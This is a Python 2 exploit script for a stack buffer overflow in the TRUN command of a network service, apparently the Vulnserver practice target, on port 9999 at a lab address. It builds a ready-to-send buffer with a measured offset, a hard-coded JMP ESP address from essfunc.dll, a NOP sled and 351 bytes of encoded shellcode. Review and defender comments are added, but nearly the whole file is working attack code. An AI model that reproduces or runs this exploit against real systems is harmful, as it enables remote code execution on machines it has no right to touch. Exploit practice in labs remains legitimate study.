#!/usr/bin/python
# Python 2 script (print statements; str literals are raw bytes, so the
# "\x.." strings below are sent byte-for-byte). It opens one TCP connection
# to a hard-coded lab host, sends a single oversized TRUN request, and prints
# the two replies it reads. Per the author's notes, the request body is:
#   'TRUN /.:/' + 2003*'A' + 4-byte address + 40*'\x90' + 351 payload bytes + 402*'C'
# Defender notes: a fixed 4-byte address of this kind only works where the
# named module loads at a fixed base and the stack is executable, so ASLR/DEP
# and stack cookies on the target break the technique; a ~2.8 KB TRUN request
# made of long single-byte runs followed by a 0x90 run is a straightforward
# IDS/IPS signature for this class of traffic.
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# NOTE(review): socket.connect() returns None, so `connect` is never
# meaningful. The socket is also only closed on the success path; any
# exception from connect()/recv()/send() leaves it open (no try/finally).
connect=s.connect(('192.168.101.158',9999))
# PAYLOAD LENGTH IS : 2809 with 2800 of A  (9-byte command prefix + 2800)
buf = 'TRUN /.:/'
# [*] Exact match at offset 2003 -- author's measured distance to the
# saved return address; the next 4 bytes land on it.
buf += "A"*(2003)
# buf += "B"*4
# 625011AF JMP ESP in essfunc.dll -- written little-endian below.
buf += "\xaf\x11\x50\x62"
# Payload size: 351 bytes
# 40 bytes of 0x90 (x86 NOP) ahead of the payload as a landing zone.
buf += "\x90"*40
# Author's 351 payload bytes, kept verbatim. Nothing on this page documents
# what they do; treat them as opaque.
buf += "\xda\xdf\xbf\x33\x2f\x25\xbd\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x52\x31\x7d\x17\x03\x7d\x17\x83\xf6\x2b\xc7"
buf += "\x48\x04\xdb\x85\xb3\xf4\x1c\xea\x3a\x11\x2d\x2a\x58"
buf += "\x52\x1e\x9a\x2a\x36\x93\x51\x7e\xa2\x20\x17\x57\xc5"
buf += "\x81\x92\x81\xe8\x12\x8e\xf2\x6b\x91\xcd\x26\x4b\xa8"
buf += "\x1d\x3b\x8a\xed\x40\xb6\xde\xa6\x0f\x65\xce\xc3\x5a"
buf += "\xb6\x65\x9f\x4b\xbe\x9a\x68\x6d\xef\x0d\xe2\x34\x2f"
buf += "\xac\x27\x4d\x66\xb6\x24\x68\x30\x4d\x9e\x06\xc3\x87"
buf += "\xee\xe7\x68\xe6\xde\x15\x70\x2f\xd8\xc5\x07\x59\x1a"
buf += "\x7b\x10\x9e\x60\xa7\x95\x04\xc2\x2c\x0d\xe0\xf2\xe1"
buf += "\xc8\x63\xf8\x4e\x9e\x2b\x1d\x50\x73\x40\x19\xd9\x72"
buf += "\x86\xab\x99\x50\x02\xf7\x7a\xf8\x13\x5d\x2c\x05\x43"
buf += "\x3e\x91\xa3\x08\xd3\xc6\xd9\x53\xbc\x2b\xd0\x6b\x3c"
buf += "\x24\x63\x18\x0e\xeb\xdf\xb6\x22\x64\xc6\x41\x44\x5f"
buf += "\xbe\xdd\xbb\x60\xbf\xf4\x7f\x34\xef\x6e\xa9\x35\x64"
buf += "\x6e\x56\xe0\x2b\x3e\xf8\x5b\x8c\xee\xb8\x0b\x64\xe4"
buf += "\x36\x73\x94\x07\x9d\x1c\x3f\xf2\x76\xe3\x68\x98\xb4"
buf += "\x8b\x6a\x60\xb8\xf0\xe2\x86\xd0\x16\xa3\x11\x4d\x8e"
buf += "\xee\xe9\xec\x4f\x25\x94\x2f\xdb\xca\x69\xe1\x2c\xa6"
buf += "\x79\x96\xdc\xfd\x23\x31\xe2\x2b\x4b\xdd\x71\xb0\x8b"
buf += "\xa8\x69\x6f\xdc\xfd\x5c\x66\x88\x13\xc6\xd0\xae\xe9"
buf += "\x9e\x1b\x6a\x36\x63\xa5\x73\xbb\xdf\x81\x63\x05\xdf"
buf += "\x8d\xd7\xd9\xb6\x5b\x81\x9f\x60\x2a\x7b\x76\xde\xe4"
buf += "\xeb\x0f\x2c\x37\x6d\x10\x79\xc1\x91\xa1\xd4\x94\xae"
buf += "\x0e\xb1\x10\xd7\x72\x21\xde\x02\x37\x0b\xe5\x4e\x15"
buf += "\x24\x40\x1b\x1b\x29\x73\xf6\x58\x54\xf0\xf2\x20\xa3"
buf += "\xe8\x77\x24\xef\xae\x64\x54\x60\x5b\x8a\xcb\x81\x4e"
# Trailing filler so the part after 'TRUN /.:/' stays exactly 2800 bytes:
# 2800 - 2003 - 4 - 351 - 40 = 402.
buf += "C"*(2800-2003-4-351-40)
# NOTE(review): the message says "Fuzzing", but this sends one fixed buffer;
# len(buf) here is 2809.
print "Fuzzing TRUN with %s bytes" % len(buf)
# First read presumably consumes the server's greeting -- confirm against
# the target; recv() blocks if nothing arrives (no timeout is set).
print s.recv(1024)
# Request is terminated with CRLF, matching a line-oriented text protocol.
s.send(buf + '\r\n')
print s.recv(1024)
s.close()